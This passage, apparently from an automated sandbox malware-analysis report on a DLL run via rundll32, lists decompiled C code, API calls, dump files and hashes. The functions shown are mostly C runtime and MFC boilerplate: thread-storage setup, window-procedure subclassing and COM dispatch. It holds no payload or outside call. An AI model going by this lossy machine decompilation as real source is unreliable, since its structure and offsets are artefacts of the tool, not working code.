                                                                                                                                  0x100355b9
                                                                                                                                  0x100355be
                                                                                                                                  0x00000000
                                                                                                                                  0x100355c0
                                                                                                                                  0x100355cc
                                                                                                                                  0x100355ce
                                                                                                                                  0x100355d2
                                                                                                                                  0x00000000
                                                                                                                                  0x100355d4
                                                                                                                                  0x100355d4
                                                                                                                                  0x100355d5
                                                                                                                                  0x100355e9
                                                                                                                                  0x100355eb
                                                                                                                                  0x00000000
                                                                                                                                  0x100355ed
                                                                                                                                  0x100355ed
                                                                                                                                  0x100355ef
                                                                                                                                  0x100355f0
                                                                                                                                  0x100355f7
                                                                                                                                  0x100355fd
                                                                                                                                  0x10035601
                                                                                                                                  0x10035605
                                                                                                                                  0x10035605
                                                                                                                                  0x100355eb
                                                                                                                                  0x100355d2
                                                                                                                                  0x100355be
                                                                                                                                  0x100355a1
                                                                                                                                  0x1003554c
                                                                                                                                  0x10035611
                                                                                                                                  0x100354a0
                                                                                                                                  0x100354a0
                                                                                                                                  0x100354a8
                                                                                                                                  0x100354a8

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                                  • __mtterm.LIBCMT ref: 100354A0
                                                                                                                                    • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                                    • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                                    • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                                    • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                                  • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                                  • __init_pointers.LIBCMT ref: 10035552
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                                  • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                                  • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                                  • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                  • API String ID: 4287529916-3819984048
                                                                                                                                  • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                  • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                                  • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                  • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E10030D90(E1004429C, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E10015B30);
				 *(_t117 - 0x120) = _t111;
				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E100201F1(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x10057854;
						if( *0x10057854 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x10057454;
								if( *0x10057454 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E10030030(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x10057454 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E10032D2F(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E1001B083(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
							__eflags = _t83 - E1001B780;
							if(_t83 != E1001B780) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E1001F30C();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E10014B55(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E10030E13(_t94, _t106, _t111);
				}
			}



























                                                                                                                                  0x1001c915
                                                                                                                                  0x1001c915
                                                                                                                                  0x1001c915
                                                                                                                                  0x1001c91f
                                                                                                                                  0x1001c924
                                                                                                                                  0x1001c927
                                                                                                                                  0x1001c92a
                                                                                                                                  0x1001c934
                                                                                                                                  0x1001c93a
                                                                                                                                  0x1001c941
                                                                                                                                  0x1001c943
                                                                                                                                  0x1001c946
                                                                                                                                  0x1001c94e
                                                                                                                                  0x1001c950
                                                                                                                                  0x1001c950
                                                                                                                                  0x1001c959
                                                                                                                                  0x1001c96e
                                                                                                                                  0x1001c970
                                                                                                                                  0x1001c973
                                                                                                                                  0x1001c978
                                                                                                                                  0x1001c97a
                                                                                                                                  0x1001c97e
                                                                                                                                  0x1001c984
                                                                                                                                  0x1001c99b
                                                                                                                                  0x1001c99b
                                                                                                                                  0x1001c9a2
                                                                                                                                  0x1001c9ef
                                                                                                                                  0x1001c9ef
                                                                                                                                  0x1001c9f1
                                                                                                                                  0x1001ca59
                                                                                                                                  0x1001ca61
                                                                                                                                  0x1001ca9d
                                                                                                                                  0x1001caa9
                                                                                                                                  0x1001cab0
                                                                                                                                  0x1001cae2
                                                                                                                                  0x1001cae5
                                                                                                                                  0x1001caeb
                                                                                                                                  0x1001caed
                                                                                                                                  0x1001caf0
                                                                                                                                  0x1001caf8
                                                                                                                                  0x1001caff
                                                                                                                                  0x1001cb01
                                                                                                                                  0x1001cb03
                                                                                                                                  0x1001cb0a
                                                                                                                                  0x1001cb12
                                                                                                                                  0x1001cb14
                                                                                                                                  0x1001cb17
                                                                                                                                  0x1001cb1a
                                                                                                                                  0x1001cb28
                                                                                                                                  0x1001cb28
                                                                                                                                  0x1001cb17
                                                                                                                                  0x1001cb03
                                                                                                                                  0x1001cb2e
                                                                                                                                  0x1001cb34
                                                                                                                                  0x1001cb40
                                                                                                                                  0x1001cb46
                                                                                                                                  0x1001cb4d
                                                                                                                                  0x1001cb4f
                                                                                                                                  0x1001cb54
                                                                                                                                  0x1001cb5a
                                                                                                                                  0x1001cb5a
                                                                                                                                  0x1001cb5a
                                                                                                                                  0x1001cb5a
                                                                                                                                  0x00000000
                                                                                                                                  0x1001cb5e
                                                                                                                                  0x00000000
                                                                                                                                  0x1001cab2
                                                                                                                                  0x1001ca65
                                                                                                                                  0x1001ca70
                                                                                                                                  0x1001ca7b
                                                                                                                                  0x1001ca81
                                                                                                                                  0x1001ca87
                                                                                                                                  0x1001ca88
                                                                                                                                  0x1001ca8a
                                                                                                                                  0x1001ca92
                                                                                                                                  0x1001ca95
                                                                                                                                  0x1001ca9b
                                                                                                                                  0x1001cac1
                                                                                                                                  0x1001cac7
                                                                                                                                  0x1001cac9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1001cad3
                                                                                                                                  0x1001cad7
                                                                                                                                  0x1001cadc
                                                                                                                                  0x1001cae0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1001cae0
                                                                                                                                  0x00000000
                                                                                                                                  0x1001ca9b
                                                                                                                                  0x1001c9f9
                                                                                                                                  0x1001c9fe
                                                                                                                                  0x1001ca05
                                                                                                                                  0x1001ca0e
                                                                                                                                  0x1001ca24
                                                                                                                                  0x1001ca26
                                                                                                                                  0x1001ca2c
                                                                                                                                  0x1001ca2e
                                                                                                                                  0x1001ca30
                                                                                                                                  0x1001ca30
                                                                                                                                  0x1001ca38
                                                                                                                                  0x1001ca3c
                                                                                                                                  0x1001ca40
                                                                                                                                  0x1001ca44
                                                                                                                                  0x1001ca4a
                                                                                                                                  0x1001ca4d
                                                                                                                                  0x1001ca4f
                                                                                                                                  0x1001ca4f
                                                                                                                                  0x00000000
                                                                                                                                  0x1001ca44
                                                                                                                                  0x1001c9a7
                                                                                                                                  0x1001c9ad
                                                                                                                                  0x1001c9b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1001c9b8
                                                                                                                                  0x1001c9bb
                                                                                                                                  0x1001c9c0
                                                                                                                                  0x1001c9cd
                                                                                                                                  0x1001c9d1
                                                                                                                                  0x1001c9d7
                                                                                                                                  0x1001c9d7
                                                                                                                                  0x1001c9e0
                                                                                                                                  0x1001c9e5
                                                                                                                                  0x1001c9e9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1001c9e9
                                                                                                                                  0x1001c986
                                                                                                                                  0x1001c98d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1001c993
                                                                                                                                  0x1001c995
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1001c95b
                                                                                                                                  0x1001c963
                                                                                                                                  0x1001cb60
                                                                                                                                  0x1001cb65
                                                                                                                                  0x1001cb65

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                                    • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                                  • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                                  • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                                  • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                                  • _memset.LIBCMT ref: 1001CA70
                                                                                                                                  • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                                  • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                                  • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                                  • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                                  • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                                  • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                  • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                  • API String ID: 867647115-4034971020
                                                                                                                                  • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                  • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                                  • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                  • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10030DFF(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10030030(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E1002BDD9(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1002DAF2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10014517(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1002CDE9(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E1001FCED(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E100144EC(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E10033135(_t300 + 0x14, 0x100505f8);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10014517(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
